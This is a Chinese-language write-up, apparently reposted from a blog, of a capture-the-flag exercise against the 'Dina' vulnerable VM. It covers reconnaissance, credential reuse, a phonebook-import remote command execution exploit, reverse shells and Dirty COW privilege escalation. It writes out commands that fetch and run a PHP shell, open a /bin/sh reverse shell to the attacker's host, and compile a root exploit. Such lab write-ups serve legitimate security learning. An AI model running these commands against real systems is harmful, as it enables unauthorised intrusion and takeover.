标签:tmp shell http Dina 渗透 192.168 提权 dirty 靶机
挺有意思的一个靶机
目录
主机发现
netdiscover -i eth0 -r 192.168.129.0/24
端口扫描
扫描端口的服务版本,服务器操作系统,中间件等信息
目录扫描
去web端看看,开始渗透
看了看页面也没啥有用信息
一个提交信息
只是爆出服务器中间件版本然后也不能操作什么
还有一个链接跳转到了一个印度人的博客里,里面有他的漏洞发现过程,我们不看^-^
来访问一下目录扫描出来的结果
http://192.168.129.201/robots.txt
http://192.168.129.201/secure/
http://192.168.129.201/tmp/
http://192.168.129.201/uploads/
点了下发现点不进去,拖到新页面也没有啥
最后我将那个后缀去掉在访问 直接触发了下载
下来要解压,里面有一个 .mp3文件,但是要解压密码,先放着
robots.txt里的几个也都进去后没发现什么
然后换了个kali2021的dirb
最后发现这里有些信息
好像是什么密码之类的,但是也还没有找到啥子登录框
现在只剩那个下载的加密文件了
刚好这里爆出了几个密码,去试试
freedom password helloworld! diana iloveroot
结果第一个就成功了
编辑打开里面的.mp3 文件,找到了一些内容
访问一下这个url,看名字像是个登陆点
直接跳转过来了
里面那句话,这个人设的密码应该是弱口令
来用.mp3 里的uname登陆下,密码使用那个网页找到的那几个
freedom password helloworld! diana iloveroot
然后使用diana登陆上来了
随便点了几下,发现这里有几个下载
结果啥也不是,浪费流量
然后在这发现了一个上传点
然后上传了一个图片马,不知道上传到哪里了
这时想到了能不能去搜一下这个cms有什么版本漏洞
看见这个 42044 里有远程命令执行漏洞
查看
让插入代码到电话簿里
想到了刚才下的几个空文件,有个phonebook,直接有格式了
直接改它
改好后import进去
同时抓包
在user-agent里执行命令,,命令执行成功
反弹shell
方法1
在kali下做如下准备
&3 2>&3") ?>
再监听1234
远程执行如下代码
wget 192.168.129.197/shell.txt -O /tmp/shell.php;php /tmp/shell.php
getshell
方法2
php -r '$sock=fsockopen("192.168.129.197",1234);exec("/bin/sh -i &3 2>&3");'
getshell
提权
尝试1-失败
查看内核版本
搜索操作系统版本漏洞
本地提权
复制到网站根目录
远程下载,编译,执行
结果失败了
尝试2-脏牛提权-成功
下载,编译,执行
wget http://192.168.129.197/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
./dirty root (root是随便给个密码,一会自己用)
然后登陆自己的用户,此时,这个用户已经是管理员了
用python开一个新窗口
登陆成功,#
看,以前的root已经被覆盖掉了
渗透完成后,要恢复
mv /tmp/passwd.bak /etc/passwd
明显不一样了,,只是前一个用户也叫firefart,,密码恢复为他的了
得到flag
标签:tmp,shell,http,Dina,渗透,192.168,提权,dirty,靶机 来源: https://blog.csdn.net/weixin_44769042/article/details/120686347
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。